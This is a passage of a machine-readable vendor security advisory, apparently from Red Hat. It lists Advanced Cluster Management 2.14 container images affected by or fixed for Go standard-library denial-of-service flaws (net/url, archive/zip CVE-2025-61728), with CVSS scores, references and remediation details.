"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"restart_required": {
"category": "none"
},
